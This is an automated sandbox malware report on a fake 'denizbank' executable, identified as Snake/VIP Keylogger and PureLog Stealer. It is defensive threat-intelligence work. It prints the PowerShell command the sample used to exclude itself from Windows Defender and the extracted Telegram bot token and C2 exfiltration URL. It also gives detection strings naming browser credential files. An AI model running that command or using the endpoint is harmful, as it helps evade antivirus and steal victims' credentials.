Edit tour

Windows Analysis Report
denizbank 25.11.2024 E80 aspc.exe

Overview

General Information

Sample name:	denizbank 25.11.2024 E80 aspc.exe
Analysis ID:	1562235
MD5:	99334c137b21036493a00305cd3189da
SHA1:	3f4e22efc054a79fe7f1644b564f7a78d438f497
SHA256:	4e3703fac7cd57231af4066573369bddffd7d7c0f8d0c4b2d0fc006c42b87dcc
Tags:	exeuser-lowmal3
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

denizbank 25.11.2024 E80 aspc.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe" MD5: 99334C137B21036493A00305CD3189DA)

powershell.exe (PID: 7628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

denizbank 25.11.2024 E80 aspc.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe" MD5: 99334C137B21036493A00305CD3189DA)

denizbank 25.11.2024 E80 aspc.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe" MD5: 99334C137B21036493A00305CD3189DA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0", "Chat id": "-4551023826", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0", "Chat_id": "-4551023826", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1801804713.0000000005270000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.4213833630.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d118:$a1: get_encryptedPassword 0x2d42d:$a2: get_encryptedUsername 0x2cf28:$a3: get_timePasswordChanged 0x2d031:$a4: get_passwordField 0x2d12e:$a5: set_encryptedPassword 0x2e82a:$a7: get_logins 0x2e78d:$a10: KeyLoggerEventArgs 0x2e3f2:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.4215846334.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf05a8:$a1: get_encryptedPassword 0x132fc8:$a1: get_encryptedPassword 0x1757e8:$a1: get_encryptedPassword 0xf08bd:$a2: get_encryptedUsername 0x1332dd:$a2: get_encryptedUsername 0x175afd:$a2: get_encryptedUsername 0xf03b8:$a3: get_timePasswordChanged 0x132dd8:$a3: get_timePasswordChanged 0x1755f8:$a3: get_timePasswordChanged 0xf04c1:$a4: get_passwordField 0x132ee1:$a4: get_passwordField 0x175701:$a4: get_passwordField 0xf05be:$a5: set_encryptedPassword 0x132fde:$a5: set_encryptedPassword 0x1757fe:$a5: set_encryptedPassword 0xf1cba:$a7: get_logins 0x1346da:$a7: get_logins 0x176efa:$a7: get_logins 0xf1c1d:$a10: KeyLoggerEventArgs 0x13463d:$a10: KeyLoggerEventArgs 0x176e5d:$a10: KeyLoggerEventArgs
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7416	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x37d2b:$a1: get_encryptedPassword 0x37f71:$a2: get_encryptedUsername 0x37b59:$a3: get_timePasswordChanged 0x37c55:$a4: get_passwordField 0x37d41:$a5: set_encryptedPassword 0x39c59:$a7: get_logins 0x39bd1:$a10: KeyLoggerEventArgs 0x39936:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: denizbank 25.11.2024 E80 aspc.exe PID: 7656	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x56142:$a1: get_encryptedPassword 0x5644d:$a2: get_encryptedUsername 0x55f5c:$a3: get_timePasswordChanged 0x56065:$a4: get_passwordField 0x56158:$a5: set_encryptedPassword 0x585f5:$a7: get_logins 0x58558:$a10: KeyLoggerEventArgs 0x581c1:$a11: KeyLoggerEventArgsEventHandler
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.5270000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b518:$a1: get_encryptedPassword 0x2b82d:$a2: get_encryptedUsername 0x2b328:$a3: get_timePasswordChanged 0x2b431:$a4: get_passwordField 0x2b52e:$a5: set_encryptedPassword 0x2cc2a:$a7: get_logins 0x2cb8d:$a10: KeyLoggerEventArgs 0x2c7f2:$a11: KeyLoggerEventArgsEventHandler
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3929d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38940:$a3: \Google\Chrome\User Data\Default\Login Data 0x38b9d:$a4: \Orbitum\User Data\Default\Login Data 0x3957c:$a5: \Kometa\User Data\Default\Login Data
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c148:$s1: UnHook 0x2c14f:$s2: SetHook 0x2c157:$s3: CallNextHook 0x2c164:$s4: _hook
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b518:$a1: get_encryptedPassword 0x2b82d:$a2: get_encryptedUsername 0x2b328:$a3: get_timePasswordChanged 0x2b431:$a4: get_passwordField 0x2b52e:$a5: set_encryptedPassword 0x2cc2a:$a7: get_logins 0x2cb8d:$a10: KeyLoggerEventArgs 0x2c7f2:$a11: KeyLoggerEventArgsEventHandler
5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d318:$a1: get_encryptedPassword 0x2d62d:$a2: get_encryptedUsername 0x2d128:$a3: get_timePasswordChanged 0x2d231:$a4: get_passwordField 0x2d32e:$a5: set_encryptedPassword 0x2ea2a:$a7: get_logins 0x2e98d:$a10: KeyLoggerEventArgs 0x2e5f2:$a11: KeyLoggerEventArgsEventHandler
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3929d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38940:$a3: \Google\Chrome\User Data\Default\Login Data 0x38b9d:$a4: \Orbitum\User Data\Default\Login Data 0x3957c:$a5: \Kometa\User Data\Default\Login Data
5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b09d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a740:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a99d:$a4: \Orbitum\User Data\Default\Login Data 0x3b37c:$a5: \Kometa\User Data\Default\Login Data
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c148:$s1: UnHook 0x2c14f:$s2: SetHook 0x2c157:$s3: CallNextHook 0x2c164:$s4: _hook
5.2.denizbank 25.11.2024 E80 aspc.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2df48:$s1: UnHook 0x2df4f:$s2: SetHook 0x2df57:$s3: CallNextHook 0x2df64:$s4: _hook
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d318:$a1: get_encryptedPassword 0x6fb38:$a1: get_encryptedPassword 0x2d62d:$a2: get_encryptedUsername 0x6fe4d:$a2: get_encryptedUsername 0x2d128:$a3: get_timePasswordChanged 0x6f948:$a3: get_timePasswordChanged 0x2d231:$a4: get_passwordField 0x6fa51:$a4: get_passwordField 0x2d32e:$a5: set_encryptedPassword 0x6fb4e:$a5: set_encryptedPassword 0x2ea2a:$a7: get_logins 0x7124a:$a7: get_logins 0x2e98d:$a10: KeyLoggerEventArgs 0x711ad:$a10: KeyLoggerEventArgs 0x2e5f2:$a11: KeyLoggerEventArgsEventHandler 0x70e12:$a11: KeyLoggerEventArgsEventHandler
0.2.denizbank 25.11.2024 E80 aspc.exe.3906cb0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2df48:$s1: UnHook 0x70768:$s1: UnHook 0x2df4f:$s2: SetHook 0x7076f:$s2: SetHook 0x2df57:$s3: CallNextHook 0x70777:$s3: CallNextHook 0x2df64:$s4: _hook 0x70784:$s4: _hook
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd2e18:$a1: get_encryptedPassword 0x115838:$a1: get_encryptedPassword 0x158058:$a1: get_encryptedPassword 0xd312d:$a2: get_encryptedUsername 0x115b4d:$a2: get_encryptedUsername 0x15836d:$a2: get_encryptedUsername 0xd2c28:$a3: get_timePasswordChanged 0x115648:$a3: get_timePasswordChanged 0x157e68:$a3: get_timePasswordChanged 0xd2d31:$a4: get_passwordField 0x115751:$a4: get_passwordField 0x157f71:$a4: get_passwordField 0xd2e2e:$a5: set_encryptedPassword 0x11584e:$a5: set_encryptedPassword 0x15806e:$a5: set_encryptedPassword 0xd452a:$a7: get_logins 0x116f4a:$a7: get_logins 0x15976a:$a7: get_logins 0xd448d:$a10: KeyLoggerEventArgs 0x116ead:$a10: KeyLoggerEventArgs 0x1596cd:$a10: KeyLoggerEventArgs
0.2.denizbank 25.11.2024 E80 aspc.exe.381e790.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xd3a48:$s1: UnHook 0x116468:$s1: UnHook 0x158c88:$s1: UnHook 0xd3a4f:$s2: SetHook 0x11646f:$s2: SetHook 0x158c8f:$s2: SetHook 0xd3a57:$s3: CallNextHook 0x116477:$s3: CallNextHook 0x158c97:$s3: CallNextHook 0xd3a64:$s4: _hook 0x116484:$s4: _hook 0x158ca4:$s4: _hook
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d318:$a1: get_encryptedPassword 0x6fd38:$a1: get_encryptedPassword 0xb2558:$a1: get_encryptedPassword 0x2d62d:$a2: get_encryptedUsername 0x7004d:$a2: get_encryptedUsername 0xb286d:$a2: get_encryptedUsername 0x2d128:$a3: get_timePasswordChanged 0x6fb48:$a3: get_timePasswordChanged 0xb2368:$a3: get_timePasswordChanged 0x2d231:$a4: get_passwordField 0x6fc51:$a4: get_passwordField 0xb2471:$a4: get_passwordField 0x2d32e:$a5: set_encryptedPassword 0x6fd4e:$a5: set_encryptedPassword 0xb256e:$a5: set_encryptedPassword 0x2ea2a:$a7: get_logins 0x7144a:$a7: get_logins 0xb3c6a:$a7: get_logins 0x2e98d:$a10: KeyLoggerEventArgs 0x713ad:$a10: KeyLoggerEventArgs 0xb3bcd:$a10: KeyLoggerEventArgs
0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2df48:$s1: UnHook 0x70968:$s1: UnHook 0xb3188:$s1: UnHook 0x2df4f:$s2: SetHook 0x7096f:$s2: SetHook 0xb318f:$s2: SetHook 0x2df57:$s3: CallNextHook 0x70977:$s3: CallNextHook 0xb3197:$s3: CallNextHook 0x2df64:$s4: _hook 0x70984:$s4: _hook 0xb31a4:$s4: _hook
Click to see the 36 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe", ParentImage: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe, ParentProcessId: 7416, ParentProcessName: denizbank 25.11.2024 E80 aspc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe", ProcessId: 7628, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe", ParentImage: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe, ParentProcessId: 7416, ParentProcessName: denizbank 25.11.2024 E80 aspc.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe", ProcessId: 7628, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T11:42:16.566587+0100	2803305	3	Unknown Traffic	192.168.2.4	49737	104.21.67.152	443	TCP
2024-11-25T11:42:25.881232+0100	2803305	3	Unknown Traffic	192.168.2.4	49744	104.21.67.152	443	TCP
2024-11-25T11:42:28.875522+0100	2803305	3	Unknown Traffic	192.168.2.4	49749	104.21.67.152	443	TCP
2024-11-25T11:42:31.906597+0100	2803305	3	Unknown Traffic	192.168.2.4	49752	104.21.67.152	443	TCP
2024-11-25T11:42:34.996754+0100	2803305	3	Unknown Traffic	192.168.2.4	49755	104.21.67.152	443	TCP
2024-11-25T11:42:37.932783+0100	2803305	3	Unknown Traffic	192.168.2.4	49757	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T11:42:12.456350+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.130.0	80	TCP
2024-11-25T11:42:14.952601+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.130.0	80	TCP
2024-11-25T11:42:18.202678+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0", "Chat_id": "-4551023826", "Version": "4.4"}
Source: 0.2.denizbank 25.11.2024 E80 aspc.exe.38c4290.1.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0", "Chat id": "-4551023826", "Version": "4.4"}
Source: denizbank 25.11.2024 E80 aspc.exe.7656.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendMessage"}

Multi AV Scanner detection for submitted file

Source: denizbank 25.11.2024 E80 aspc.exe

ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: denizbank 25.11.2024 E80 aspc.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: denizbank 25.11.2024 E80 aspc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49735 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50039 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:50057 version: TLS 1.2
